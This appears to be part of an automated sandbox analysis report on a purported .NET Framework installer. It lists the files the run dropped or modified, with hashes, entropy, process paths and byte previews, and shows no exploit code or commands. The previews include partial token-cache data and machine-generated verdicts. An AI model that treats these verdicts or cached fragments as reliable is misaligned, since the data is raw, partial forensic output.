                                                            File Type:PC bitmap, Windows 3.x format, 49 x 49 x 8, image size 2550, resolution 2834 x 2834 px/m, cbSize 3628, bits offset 1078
                                                            Category:dropped
                                                            Size (bytes):3628
                                                            Entropy (8bit):4.8382652865388724
                                                            Encrypted:false
                                                            SSDEEP:48:f0sO8Kdwc6o5NF5ghwwpnMOccFpscGqfkemvIQpQK/xHiggTfGRgVC0q:cMa1krnrJmdQ+EgyfG3
                                                            MD5:514BFCD8DA66722A9639EB41ED3988B7
                                                            SHA1:CF11618E3A3C790CD5239EE749A5AE513B4205CD
                                                            SHA-256:6B8201ED10CE18FFADE072B77C6D1FCACCF1D29ACB47D86F553D9BEEBD991290
                                                            SHA-512:89F01C3361BA874015325007EA24E83AE6E73700996D0912695A4E7CB3F8A611494BA9D63F004DCD4F358821E756BE114BCF0137ED9B130776A6E26A95382C7B
                                                            Malicious:false
                                                            Preview:BM,.......6...(...1...1................................iI.|4..{3...8...:...qI..oH..hH......8...9...<...A...>..}<...@...F...C..t:...A...D...qG..C...E..m:...L...K...H...G...L...N..yB...L..........N...S...Z...S..vC...J...U......V...S...R...Y...V...Y...Y...M...Z...h...x8..|<...i......]...\...Y...]...V...^...^...e...c...o...l...c...a..._..._...b...X...j...^...d...k...j...q...u...p...x+..p.....h...g...d...j...b...u...u...n...t...t...s...m...r...u...s...{"...4...i..r...m...m...w...u...q...t...}...K...N..U..l..........r.......x...{....!...#...)..@..N..V...............$...#...'...,..4..5..:..C..T..u......................... ...'...*..,.....<..B..V..\..e..p..............)..,..2..4..5..9..<..<..R..\..d...y........................................................ ..)..3..8..:..B..L..O..n......................................................4..^....................O...b...|.........................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\sqmapi.dll

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):144416
                                                            Entropy (8bit):6.7404750879679485
                                                            Encrypted:false
                                                            SSDEEP:3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
                                                            MD5:3F0363B40376047EFF6A9B97D633B750
                                                            SHA1:4EAF6650ECA5CE931EE771181B04263C536A948B
                                                            SHA-256:BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
                                                            SHA-512:537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................................Rich...................PE..L....IE...........!.........$.....................l.........................@......R.....@.........................D.......$...d....................... (... ......P...8............................\..@.......t.......D............................text............................... ..`.data...............................@....rsrc...............................@..@.reloc....... ......................@..Ba.IE8....IEC....IEP....IEZ.....IEe....IEP...........msvcrt.dll.ADVAPI32.dll.ntdll.DLL.USER32.dll.KERNEL32.dll...............................................................................................................................................................................................................................................

                                                            C:\6c8944922f7b98d0b6cd82b768\watermark.bmp

                                                            Download File
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PC bitmap, Windows 3.x format, 164 x 628 x 8, image size 102994, resolution 3779 x 3779 px/m, cbSize 104072, bits offset 1078
                                                            Category:dropped
                                                            Size (bytes):104072
                                                            Entropy (8bit):7.2628723112196
                                                            Encrypted:false
                                                            SSDEEP:768:QKUpOeBmAj72KbvEvffvCv7cTIMUHuRzHA8X9H51T9ho4xw7CgB1:QKULmAfbvEv47cIHzE9vo4SuU1
                                                            MD5:B0075CEE80173D764C0237E840BA5879
                                                            SHA1:B4CF45CD5BB036F4F210DFCBA6AC16665A7C56A8
                                                            SHA-256:AB18374B3AAB10E5979E080D0410579F9771DB888BA1B80A5D81BA8896E2D33A
                                                            SHA-512:71A748C82CC8B0B42EF5A823BAC4819D290DA2EDDBB042646682BCCC7EB7AB320AFDCFDFE08B1D9EEBE149792B1259982E619F8E33845E33EEC808C546E5C829
                                                            Malicious:false
                                                            Preview:BM........6...(.......t...........R...................};.......F.......T...c....H..b...t...m...z...d...a..._...f...f....&..x...j...w...o...k...r....+..........|...u...|...q...v...w...|...2..~...z.......x...........{.................................................................... ...#..:..P..e................................#..#..&..(..+..+..-........EDA................$..,../..4..2..6..;...........................$..'..,..0..:..?..E......................6..5..>...D...I...K...Q...j...................=...D...L...P...U...V...\...r.....................Y...\...`...d...b...f...j...l...{..................................`...g...o...u...|....................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):889416
                                                            Entropy (8bit):7.856409051573377
                                                            Encrypted:false
                                                            SSDEEP:24576:+tW4x8xAxCdUcyezFSjaBHFaNlsqK5/oh6iZf1LUXw/vxNI:d4x8xqCGexm8FCspg0iZf1LUXD
                                                            MD5:53406E9988306CBD4537677C5336ABA4
                                                            SHA1:06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
                                                            SHA-256:FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
                                                            SHA-512:4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}...,...}......}.......}...//..}.../...}.../...}.......}...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}..........................PE..L......J.........."..........^...................@..........................@......a8....@...... ..................@.......D........................z..h.......l....................................V..@............................................text.............................. ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\EQB4OREJ.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1272
                                                            Entropy (8bit):5.35701154853497
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6Kha1qE4GIsCKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oa1qHGIsCtHTHhAHKKE
                                                            MD5:C6B44A8E6FB7CA041E86A0771A752AA5
                                                            SHA1:B0CF085072D5FFF851AA53E60E09631A2CDC0363
                                                            SHA-256:5994B74D02CA48DC49F353BE97E8293E3AE08B043B0BE27622868ACB25290866
                                                            SHA-512:AEDD76D49E940F3C7AE093351EB2E1B651F869BEBBDC0529B75C1C003ED3863CA4C109F2490F2B42C40AD238DB0537DEF1F2BCF59AD19F9B0367F48CA444BA06
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            File Type:CSV text
                                                            Category:modified
                                                            Size (bytes):859
                                                            Entropy (8bit):5.379735105545312
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                            MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                            SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                            SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                            SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word\1380790193167760279.C4

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BB7DF04E1B0A2570657527A7E108AE23
                                                            SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                                            SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                                            SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                                            Malicious:false
                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Word\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):5.205971983413091
                                                            Encrypted:false
                                                            SSDEEP:3:13ZjF/1jQvP5uOt+kiE2J5xAIw3r3P8XlKs:ZZjOwOwkn23fM/s
                                                            MD5:7359CE0BBF7D35AAE49A00F244F39D77
                                                            SHA1:764FC39D51A56838306F4B2BD9F3DD801ECE5603
                                                            SHA-256:C8236BD2A464FDF94497AD7A699FD21181D1F1000906EDF125D2823E2F0DB5BE
                                                            SHA-512:56715664EAB703E56AEB329637E9A22137EB65A3B93E37B6FE7F73BF468D3EF1C849170974F464004072723314C63EAFAA2D7506D672734178F80B12FCEFA7ED
                                                            Malicious:false
                                                            Preview:S.._..W....U.<F..L..........*file:///C:\Users\user\AppData\Local\Temp\..BlockersInfo1..rtf.....

                                                            C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):0.09216609452072291
                                                            Encrypted:false
                                                            SSDEEP:3:lSWFN3l/klslpF/4llfll:l9F8E0/
                                                            MD5:F138A66469C10D5761C6CBB36F2163C3
                                                            SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                            SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                            SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-journal

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:SQLite Rollback Journal
                                                            Category:dropped
                                                            Size (bytes):4616
                                                            Entropy (8bit):0.13760166725504608
                                                            Encrypted:false
                                                            SSDEEP:3:7FEG2l+1xS/FllkpMRgSWbNFl/sl+ltlslVlllfll1r:7+/lGEg9bNFlEs1EP/x
                                                            MD5:155BD38827937DCE5B64F5F6D8276EF4
                                                            SHA1:ECCD7304FADB42048AEE085ED67D4297EEF0E2D5
                                                            SHA-256:742A28DECAD9032C0D699B31C873E90434F247E6F9E84171DB789927BA24F069
                                                            SHA-512:DA54F3F6C96FF9392D2CE319A4E657A14A1B94568B5DD1116728B721381158C9892D84A5C6D8A29F437388E3DD02274892EC6DAFB28A8D0683087D910C7F4106
                                                            Malicious:false
                                                            Preview:.... .c.....8.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shm

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.043427841252497504
                                                            Encrypted:false
                                                            SSDEEP:3:G4l2NjEUBX4lCl2NjEUBPslL9//Xlvlll1lllwlvlllglbXdbllAlldl+l:G4l21iCl21aL9XXPH4l942U
                                                            MD5:AD4678387BF39DA9DBEC57F63EC33EE0
                                                            SHA1:B325267CF0323D578E95866645A9701604D4A5F0
                                                            SHA-256:358E2C730DAC868BBB59A0FD4DE719B022DBAAA001A0E432527BFB62E92B24E7
                                                            SHA-512:FABB2F25590774E76E2754F79C88BEFEB9E2DC2F432AE10B6C7A936B717278CF80736C0A6682113D38210E5B5E7B96355A2441ACAEA0A85AD684AFC44707148A
                                                            Malicious:false
                                                            Preview:..-.....................x...X......W....7WXX...-.....................x...X......W....7WXX.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                            Category:modified
                                                            Size (bytes):45352
                                                            Entropy (8bit):0.3953450218915866
                                                            Encrypted:false
                                                            SSDEEP:24:KNB4leXQ3zRD3CWpUll7DBtDi4kZERDa6zqt8VtbDBtDi4kZERDo:uBAsQ1eWpUll7DYMXzO8VFDYM
                                                            MD5:E395EC87F8AFD6A2AD4DB93316D54DF9
                                                            SHA1:79A2541CECA99A7A2F12EC4E95FB626C3915769F
                                                            SHA-256:3261507DE2CF3AD97C8D756C5B30F8BE5464DFF61449B9DF1AFFC6C22B08EEF3
                                                            SHA-512:8EB9EBF4EE8E55858CE9514C8C99F9FFD58FA6DF78C31066DD9B7050078595C3A2F1F3F55BABDA1F1DFA8C50FB5374D80F2923AAEA094224BC33EBEEF5CF52DB
                                                            Malicious:false
                                                            Preview:7....-.............W.......L............W..PGA.@.K3SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2278
                                                            Entropy (8bit):3.8582065897669575
                                                            Encrypted:false
                                                            SSDEEP:48:uiTrlKxsxxIxl9Il8uC1DIqaDVciFNBzyxdd1rc:v0YBqaRvBOxm
                                                            MD5:156C9C0C7DB159907472ADDC69DF3210
                                                            SHA1:F76BEDDF45CB07EDC908C12185CC92D7DEB96D12
                                                            SHA-256:38A5B3F68EAD07292B3849C1DBD5447AB034D8FAABC32A94C1411D9AEF360B63
                                                            SHA-512:2D27AD8567BDEE207C0AD9E3600F4D6680A616C00C89E43BFC2CA9D3DD9A2280936FBEFA7E65D819F90D5151956955898F8FD3DCCD55529122C32D11843885D7
                                                            Malicious:false
                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.P.U.o.K.t.P.2.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.H.A.b.P.x.

                                                            C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4542
                                                            Entropy (8bit):4.004352529348239
                                                            Encrypted:false
                                                            SSDEEP:48:uiTrlKxxx+xD9Il8uCWlSNoAKxUJIm23qLSHMcRUn/ms4o5IqT2xJ/GSjBMZyy5r:RYhSKxtm2aOHw+s8qaRG7RM0rBlVSe
                                                            MD5:202967F42CB349816CCA163808852C84
                                                            SHA1:F60BB1C28A031E9114FDE170C5A6F0E4C4524DCB
                                                            SHA-256:B35FD54A0B25F154A530D921E1E225C223752895FB63F52B1E0EC41671325D6C
                                                            SHA-512:61EFD5398C0642117156239444F7766CCA076F51EDD506F4350EDFD0B10BB2B1DD9AC48D6F410B386E9DDC46039A2F86F9888185D0C5A5ED9878E0DB4CA1DC90
                                                            Malicious:false
                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".9.9.k.u.E.M.v.2.2.Q.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.7.H.A.b.P.x.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{1A68A807-920D-4416-A90B-9BC6FFDE7ACD}.tmp

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2160
                                                            Entropy (8bit):2.3094612443201528
                                                            Encrypted:false
                                                            SSDEEP:24:EsqvOuLPYhLmW0VMFqVGRXOruJuNfb6q4LTmqFd:Xqmu7YhyWUGerugNzXiTZd
                                                            MD5:6F0AE5B0693054B90A3BD61045A7C6A6
                                                            SHA1:DD21DBB38D7580104A39287F819CEF22B5362A93
                                                            SHA-256:DD376725224E9F6C90E938436250A5597B7BF2576625DA5AA4848CA2231481E2
                                                            SHA-512:B6D35A4EE268E3F78EE6B98B24576537731CD2F1594CD42D8DEC5780C8F8DB28FA2D6FFD1BFF374F52B858640138576C7C2826E4916DAF4A713BAC5FD82994C8
                                                            Malicious:false
                                                            Preview:D.e.t.a.i.l.s.....1....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................<..CJ..KH..OJ+.QJ+.^J+.aJ...CJ..KH..OJ+.QJ+.^J+.aJ...!5..>*.CJ..K

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{357ACFAE-3D4F-41EA-8F70-69E0A95F98DB}.tmp

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1536
                                                            Entropy (8bit):1.3120375248498821
                                                            Encrypted:false
                                                            SSDEEP:3:ml+lGl+l+l+l1PPPXll1l7lhlJvl5hzldlxpxl/b1l/pl/Ppl/NllXljl/tl/rlh:mEMEEEul39lCgK1qV23S3y2l8q2sP38n
                                                            MD5:1B75ECA4623ECDE0AB8DD6789CB556CD
                                                            SHA1:8415BA3A5B91D502DB0E5A5C4D84AFC465EDFE82
                                                            SHA-256:91EFA77FC4D1EB33ADA21558C64C44D1101962F184F19FD50BD1870E80F1CC33
                                                            SHA-512:944D3D264AFB2373BB0EF5EAC14B69E216E57D24A15538962FE57AA1B1A6E7C8B46C6D25E49C36BCA060CFE1173255572AB84008248FC7A2D2E2EC93A82E734C
                                                            Malicious:false
                                                            Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...............................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf (copy)

                                                            Download File
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
                                                            Category:dropped
                                                            Size (bytes):708
                                                            Entropy (8bit):5.097676248548782
                                                            Encrypted:false
                                                            SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYn8lIz2:MNifQallTv3MswTbYZIz2
                                                            MD5:FF86F79D948C6F43BDE1852C1C66A829
                                                            SHA1:56A223843B07CE5077287CAED98F41ED904E53D6
                                                            SHA-256:FEB27E2D4F63A3ADB399D74E2A7199ABD5C9582AFC0618F968C260A913D6C885
                                                            SHA-512:FCD987163B6D7EC8873ECB95EE16C28EC0B524B5C5AE7D34F24DEC15727C80F3D0B11E8608AC3C2153D7DBE413CBD9EC0841F71BB6DDE64DD1C6904531E38CBD
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 has already been installed on this computer.\par..\pard\par..\par..\par..}...

                                                            C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1696427878875984300_60C2EC37-9F43-4F0F-AA01-2E19BF657142.log

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):20971520
                                                            Entropy (8bit):0.004016794055560718
                                                            Encrypted:false
                                                            SSDEEP:96:vouIVKlFQ8dum7KIuwKTnKSeQ8dYJh+KJ1Q8dX5sQKO0Q8dub9E7e4DKX9Q8dv4d:gjoDKTXhsb043eXBcf
                                                            MD5:D352B1D4318B071829010D9481007EC2
                                                            SHA1:5FBD6CB4E9DC74A53DE1C780E9CE2D82CB1FD786
                                                            SHA-256:E2537FD61A9EE250E2521CD4A2568200E8BF44734A2EA068377EB5950E16096F
                                                            SHA-512:FC324197425DD8A9D7B3C2C629C785E383C930861162D90D496A46EBA2FA89CF843EE4219A6569CF068A9E1A22990FA626C402502010BF46D4650856AEB66822
                                                            Malicious:false
                                                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/04/2023 13:57:59.100.WINWORD (0x8EC).0x19BC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":29,"Time":"2023-10-04T13:57:59.100Z","Contract":"Office.System.Activity","Activity.CV":"N+zCYEOfD0+qAS4Zv2VxQg.6.1","Activity.Duration":423,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...10/04/2023 13:57:59.100.WINWORD (0x8EC).0x19BC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":30,"Time":"2023-10-04T13:57:59.100Z","Contract":"Office.System.Activity","Activity.CV":"N+zCYEOfD0+qAS4Zv2VxQg.6","Activity.Duration":3052,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDia

                                                            C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1696427878876616700_60C2EC37-9F43-4F0F-AA01-2E19BF657142.log

                                                            Download File
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):20971520
                                                            Entropy (8bit):0.0
